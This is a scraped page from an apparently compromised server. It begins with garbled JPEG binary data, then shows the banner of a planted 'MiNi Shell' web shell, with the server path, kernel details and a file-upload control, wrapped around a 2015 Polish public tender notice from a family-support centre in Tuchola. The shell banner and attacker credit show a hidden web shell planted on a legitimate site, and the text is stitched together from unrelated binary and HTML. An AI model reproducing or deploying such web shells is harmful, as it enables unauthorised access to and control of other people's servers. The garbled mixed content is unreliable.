JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150520/119370-N-2015.html

<p class="kh_header"><b>Tuchola: Świadczenie usług w ramach projektu Schematom STOP! Wspólne działania instytucji pomocy społecznej i instytucji rynku pracy cz. 1</b><br>
<b>Numer ogłoszenia: 119370 - 2015; data zamieszczenia: 20.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Pocztowa 7, 89-500 Tuchola, woj. kujawsko-pomorskie, tel. 52 559 20 18, faks 52 559 20 18.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcprtuchola.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w ramach projektu Schematom STOP! Wspólne działania instytucji pomocy społecznej i instytucji rynku pracy cz. 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja usług w ramach projektu Schematom STOP! Wspólne działania instytucji pomocy społecznej i instytucji rynku pracy - pilotaż
Organizacja wizyty studyjnej do Olsztyna dla 16 przedstawicieli powiatu tucholskiego (część 1 zamówienia) oraz przeprowadzenie treningu interpersonalnego dla 10 rodzin uczestniczących w projekcie (część 2 zamówienia)..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>do 50% wartości zamówienia podstawowego, polegających na powtórzeniu tych samych zajęć w przypadku, jeżeli zamówiona ilość okaże się niewystarczająca lub jeżeli zaistnieje konieczność skierowania do udziału większej ilości Uczestników i/lub jeżeli w okresie następnych trzech lat od podpisania umowy koniecznym okaże się nabycie usług tożsamych z przedmiotem zamówienia, na przykład w ramach kolejnych projektów EFS i/lub w ramach podstawowej działalności zamawiającego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 55.10.00.00-1, 55.30.00.00-3, 60.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w Formularzu ofertowym zgodnie z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1
Oświadczenie w Formularzu ofertowym zgodnie z art. 44 ustawy Pzp.
Część 2
1) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, oraz informacją
o podstawie do dysponowania tymi osobami na formularzu, który stanowi załącznik nr 4 do SIWZ.
2) Wykaz zrealizowanych usług, który stanowi załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w Formularzu ofertowym zgodnie z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w Formularzu ofertowym zgodnie z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w Formularzu ofertowym zgodnie z art. 44 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Propozycja miejsca zakwaterowania (dotyczy części 1 zamówienia)
Wykaz zrealizowanych usług (dotyczy części 2 zamówienia)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	osoby wskazane w ofercie jako odpowiedzialne za świadczenie usług za zgodą Zamawiającego będą mogły zostać zastąpione innymi o kwalifikacjach, doświadczeniu i wykształceniu nie niższym niż warunki udziału w postępowaniu oraz doświadczeniu, które stanowi kryterium oceny ofert nie mniejszym niż osoby wskazanej w pierwotnej ofercie,
2)	zmiana liczby uczestników i związanej z tym kwoty wynagrodzenia należnego Wykonawcy,
3)	zmiana terminu realizacji umowy,
4)	zmiana miejsca realizacji usługi pod warunkiem spełnienia warunków określonych
w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcprtuchola.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Tucholi, ul. Pocztowa 7, 89-500 Tuchola.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2015 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Tucholi, ul. Pocztowa 7, 89-500 Tuchola.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wizyta studyjna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Odbiorcy wizyty studyjnej: uczestnicy projektu Schematom STOP! Wspólne działania instytucji pomocy społecznej i instytucji rynku pracy - pilotaż. Liczba osób - 16. Liczba uczestników może ulec zmianie.
2. Miejsce: powiat olsztyński.
3. Termin: 22.06.2015 r. - 24.06.2015 r.  
4. Celem wizyty studyjnej jest zapoznanie się z doświadczeniami w zakresie realizacji pilotażu projektu. 
5. Za merytoryczny przebieg wizyty odpowiada Zamawiający.
6. Wykonawca zobowiązany jest przeprowadzić wizytę studyjną według poniższego programu:
Dzień 1 (poniedziałek)
7.00 - wyjazd uczestników wizyty studyjnej (dalej uczestników) z Tucholi, ul. Pocztowa 7,
10.00 - 15.00  spotkanie  z Powiatowym Zespołem Koordynującym Współpracę (dalej PZKW) z Miejskiego Ośrodka Pomocy Społecznej w Olsztynie (dalej MOPS; 
10 uczestników i 6 osób z MOPS, z 2 przerwami kawowymi),
10.00 - 15.00 spotkanie z Mobilną Grupą Interdyscyplinarną (dalej MGI) z MOPS (6 uczestników i  9 osób z MOPS, z 2 przerwami kawowymi),
15.30 - 16.30  obiad w restauracji hotelowej,
16.30 - 19.00 zakwaterowanie w hotelu,
19.00 - 22.00 uroczysta kolacja w restauracji hotelowej.
Dzień 2 (wtorek)
9.00 - śniadanie w restauracji hotelowej,
10.00 - 15.00 spotkanie z PZKW z MOPS (10 uczestników i 9 osób z MOPS, z 2 przerwami kawowymi),
10.00 - 15.00 spotkanie z MGI z MOPS (6 uczestników i  9 osób z MOPS, z 2 przerwami kawowymi),
15.00 - 16.00 obiad w restauracji hotelowej,
16.00 - 18.00 czas wolny dla uczestników,
18.00 -  19.00 kolacja w restauracji hotelowej.
Dzień 3 (środa)
9.00 - śniadanie w restauracji hotelowej,
10.00 - 11.30 spotkanie podsumowujące (16 uczestników, z 1 przerwą kawową),
12.00 - 13.00 obiad w restauracji hotelowej,
13.30 - wyjazd uczestników z Olsztyna.
7.	Wykonawca zobowiązany jest zapewnić:
1)	transport:
a)	z ul. Pocztowej 7 w Tucholi do miejsca zakwaterowania. Przewóz powinien być przeprowadzony zgodnie z ustawą z dnia 06.09.2001 r. o transporcie drogowym (Dz. U.
z 2013, poz. 1414 z późn.zm.) oraz innymi aktami prawa regulującymi przewóz osób,  
b)	transport z miejsca zakwaterowani do Tucholi, ul. Pocztowa 7,
c)	transport uczestników środkiem pojazdu sprawnym technicznie, posiadającym ważne badania techniczne, ważne ubezpieczenie OC, sprawną klimatyzację, jednym pojazdem dla całej grupy uczestników wizyty,
d)	Wykonawca w razie awarii pojazdu zapewnia pojazd zastępczy na własnych koszt, spełniający wymagania określone ust. c),
2)	ubezpieczenie NNW uczestników wyjazdu,
3)	zakwaterowanie:
a)	w hotelu lub pensjonacie aktualnie zaszeregowanym do kategorii minimum trzy gwiazdki lub domu wycieczkowym I kategorii, zgodnie z Rozporządzeniem ministra gospodarki i pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, bezpłatnym dostępem do atrakcji znajdujących się na ternie obiektu zakwaterowania;
b)	obiekt zakwaterowania powinien znajdować się w odległości nie większej niż 30 km od siedziby MOPS w Olsztynie,   
c)	zakwaterowanie w pokojach: 
- sześciu pokojach 2-osobowych,  
- czterech pokojach 1-osobowych.
4)	wyżywienie, na które składa się:
a)	2 śniadania (2 i 3 dzień wizyty studyjnej) dla 16 uczestników na terenie obiektu zakwaterowania; śniadanie w formie bufetu szwedzkiego z dostępem minimum do: pieczywa, masła, sera, dżemu, jaj, 2 rodzajów wędlin, warzyw, soku owocowego, kawy, herbaty, wody mineralnej;
b)	3 obiady (1, 2, 3 dzień wizyty studyjnej): dla 16 uczestników oraz 13 członków PZKW
i MGI z MOPS (1 dzień), 16 uczestników oraz 18 członków PZKW i MGI z MOPS (2 dzień),
16 uczestników (3 dzień); obiad powinien być zapewniony w restauracji znajdującej się na terenie obiektu zakwaterowania, obiad powinien być podany w formie bufetu szwedzkiego
i składać się z minimum: zupy, dania mięsnego, dania rybnego, dania wegetariańskiego, zestawu surówek, ziemniaków, ryżu, makaronu, wody mineralnej, soków owocowych (minimum 2 rodzaje), deseru (minimum dwa rodzaje ciasta), 
c)	uroczystej kolacji dla 16 uczestników wyjazdu oraz 13 członków PZKW i MGI z MOPS (1 dzień) w obiekcie zakwaterowania, w sali zarezerwowanej tylko dla uczestników kolacji; kolacja powinna składać się z dań ciepłych (mięsne i wegetariańskie), dań zimnych, napojów: kawy, herbaty, soków owocowych (minimum 2 rodzaje), wody mineralnej; deseru (minimum: ciasta - minimum dwa rodzaje, owoce).
d)	kolacji (2 dzień) dla 16 uczestników, kolacja powinna być zorganizowana na terenie obiektu zakwaterowania w formie bufetu szwedzkiego składającego się z dań ciepłych (mięsne i wegetariańskie), dań zimnych, napojów: kawy, herbaty, soków owocowych (minimum 2 rodzaje),  wody mineralnej.
e)	cateringu dla 29 osób (1 dzień), 34 osób (2 dzień), 16 osób (3 dzień) w czasie przerw kawowych zorganizowanych zgodnie z programem wizyty studyjnej z pkt. 7; na usługę cateringową powinny składać się: ciasto (2 rodzaje), ciastka suche, owoce, woda mineralna, soki owocowe (minimum 2 rodzaje), kawa, herbata, obsługa.
5)	2 sale szkoleniowe (1 i 2 dzień) oraz 1 salę szkoleniową (3 dzień) na potrzeby organizacji spotkań, o których mowa w pkt. 7, wyposażone w projektor multimedialny, komputer przenośny z zainstalowanym oprogramowaniem MS Office, flipchart; sale szkoleniowe powinny znajdować się na terenie obiektu zakwaterowania i zapewniać swobodną organizację spotkań zgodnie z programem z pkt. 7.
6)	materiały szkoleniowe (36 kompletów) składające się z: 1 notatnika a4 80 kartek,
1 długopisu automatycznego niebieskiego.
8.	Za dobór uczestników wyjazdu i przedstawicieli MOPS odpowiada Zamawiający..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3, 60.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 22.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Warunki zakwaterowania - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie treningu interpersonalnego dla 10 rodzin uczestniczących w projekcie metodą indukcji behawioralnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Grupa docelowa: 10 rodzin (52 osoby) wielodzietnych, mieszkańców powiatu tucholskiego, korzystających ze świadczeń pomocy społecznej, z których jeden członek jest osobą bezrobotną.
2.	Okres realizacji: czerwiec -sierpień 2015 r.
3.	Miejsce realizacji - miejscowość zamieszkania rodzin (powiat tucholski):
1)	Tuchola.
2)	Łyskowo.
3)	Wielka Komorza.
4)	Lubiewo.
5)	Przy Szosie Sępoleńskiej.
6)	Wełpin.
7)	Kruszka.
8)	Okoniny Nadjeziorne.
9)	Żalno.
4.	Miejsca realizacji usługi wskazuje i zapewnia Zamawiający.
5.	Wymiar czasu pracy z rodziną: 40 godzin (1 godzina = 45 minut) w formie indywidualnych konsultacji oraz 3 godziny konsultacji telefonicznych na rodzinę (łącznie 430 godzin). Szczegółowy harmonogram zostanie ustalony pomiędzy Zamawiającym a Wykonawcą.
6.	Praca z rodziną będzie opierała się na indywidualnych spotkaniach rodziny z trenerem i składać się będzie z czterech etapów:
1)	Diagnozy rodzin (wskazanie mocnych i słabych stron).
2)	Wzbudzanie motywacji do zmiany.
3)	Faza działania (wdrożenie planu zmierzającego do zmiany zachowań rodziny).
4)	Faza utrwalenia zmian. 
7.	Praca powinna być zorientowana na doradztwo, udzielenie wsparcia, towarzyszenie, wzmacnianie, mentoring poprzez pracę z indywidualnym przypadkiem.
8.	Wszystkie niezbędne do realizacji zadania narzędzia, w tym arkusze diagnostyczne, dzienniki i inne zapewnia Wykonawca.
9.	Trener w realizacji zadań powinien ściśle współpracować z opiekunem rodziny wskazanym przez Zamawiającego (uzgadnianie terminów, przedstawianie sprawozdań itp.) oraz przestawić w formie pisemnej Zamawiającemu raport końcowy z realizowanych działań..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie oferenta - 60</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com